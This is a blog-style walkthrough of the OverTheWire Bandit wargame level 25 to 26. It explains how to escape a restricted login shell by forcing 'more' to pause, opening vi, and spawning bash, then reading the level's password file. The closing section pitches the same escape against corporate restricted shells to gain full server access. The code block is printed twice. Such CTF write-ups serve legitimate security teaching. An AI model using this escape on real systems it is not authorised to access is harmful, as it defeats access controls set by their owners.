- Get link
- X
- Other Apps
- Get link
- X
- Other Apps
Bandit Level 26 Walkthrough
Level 25 ➔ Level 26: Escaping the Restricted Shell
1. My Objective
I am currently logged in as bandit25. My goal is to log into bandit26. I have been provided with an SSH key (bandit26.sshkey) in my home directory. However, there is a catch: bandit26 does not use the standard /bin/bash shell. Instead, it uses a custom script that shows some text and immediately logs me out. I need to find a way to "break out" of that script and get a real command prompt.
The Technical Problem: When I log in via SSH, the server executes the user's assigned shell. If that shell is a script that ends with exit, the connection closes instantly. I have to interrupt that script before it finishes.
2. The Feynman Explanation: The Rigged Elevator
How do I get into a building if the elevator is programmed to take me straight back to the lobby the moment I get in?
The Maintenance Hatch Analogy:
Imagine I enter an elevator (the SSH connection). The elevator has no floor buttons; it is hard-coded to show me a picture of the building and then go back down to the street.
To stop it, I have to make the elevator "Wait." I do this by shrinking the elevator car so much that the picture it wants to show me doesn't fit on the wall. The elevator is forced to pause and ask: "This picture is too big, do you want me to scroll down?" (This is the Pager or more command).
While the elevator is paused and waiting for my answer, I notice a hidden Maintenance Hatch (the 'v' key) in the ceiling. I climb through that hatch into the building's inner workings (the Editor/vi). Once I am in the maintenance area, I can tell the building: "Ignore the elevator's rules; give me the Master Key." Escaping a shell is about finding the moment a program pauses to talk to you and using that moment to jump into a different program.
3. Practical Solution
I start by checking the shell used by bandit26. Then, I use a terminal resizing trick to force the login script to pause.
# Step 1: Check what shell bandit26 is using
bandit25@bandit:~$ grep bandit26 /etc/passwd
bandit26:x:11026:11026:bandit26:/home/bandit26:/usr/bin/showtext
# Step 2: I check what 'showtext' does
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
more ~/text.txt
exit 0
# Step 3: THE ESCAPE
# 1. Shrink your terminal window manually (make it only 2-3 lines tall).
# 2. Log in using the SSH key.
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost -p 2220
# 3. Because the window is small, 'more' pauses. Type 'v' to enter vi.
# 4. Inside vi, type the following commands:
:set shell=/bin/bash
:shell
# Step 4: I am now in a real shell. Let's get the password!
bandit26@bandit:~$ cat /etc/bandit_pass/bandit26
c764Ng6pE6vSAr4S019SAb36906sV... (Password Revealed!)
bandit25@bandit:~$ grep bandit26 /etc/passwd
bandit26:x:11026:11026:bandit26:/home/bandit26:/usr/bin/showtext
# Step 2: I check what 'showtext' does
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
more ~/text.txt
exit 0
# Step 3: THE ESCAPE
# 1. Shrink your terminal window manually (make it only 2-3 lines tall).
# 2. Log in using the SSH key.
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost -p 2220
# 3. Because the window is small, 'more' pauses. Type 'v' to enter vi.
# 4. Inside vi, type the following commands:
:set shell=/bin/bash
:shell
# Step 4: I am now in a real shell. Let's get the password!
bandit26@bandit:~$ cat /etc/bandit_pass/bandit26
c764Ng6pE6vSAr4S019SAb36906sV... (Password Revealed!)
Why did this work?
The more command is a "pager"—its job is to show text one screen at a time. When my window was too small to show the whole file, more stopped and waited for my input. By pressing 'v', I used a built-in feature of more that opens the current file in the vi editor. From inside vi, I reconfigured the internal "shell" variable and told the editor to spawn a new bash process for me.
🚀 My Pro Tips: Breaking Pagers and Editors
✨ The /etc/passwd Goldmine
Whenever I encounter a user that I can't log into, the first thing I check is /etc/passwd. This file tells me the user's home directory and, most importantly, their Login Shell. If the shell isn't /bin/bash or /bin/sh, I know I'm dealing with a restricted environment.
⭐ vi is a Powerhouse
Many legacy Linux tools allow you to "escape" to an editor. If you ever find yourself in a tool that uses a pager (like man, less, or more), try pressing 'v'. If it opens an editor, you likely have a path to a full shell.
🔍 Windows Users Beware
As the mission note says: PowerShell handles window resizing differently and might not trigger the more pause correctly. If you're on Windows, use the old Command Prompt (cmd.exe) for this specific level.
4. Why this matters
I see "Restricted Shells" (rbash) often in corporate environments where a company wants to give a contractor access to only one specific tool (like a database console). If that tool has a "Help" menu or a "View Logs" option that uses a pager, I can use this exact technique to escape the restriction and gain full access to the server's operating system.
Prison Break Successful!
I've successfully escaped the restricted shell. I'll save this password and move on to Level 26 ➔ Level 27, where I will encounter my first setuid binary that I can't simply read!
Tags: #Linux #Bandit #OverTheWire #ShellEscape #RestrictedShell #vi #MoreCommand #PrivilegeEscalation #CyberSecurity #FeynmanTechnique #CodeWithPritom #ProTips
- Get link
- X
- Other Apps
Devoted to excellence as a Software Engineer
Comments
Post a Comment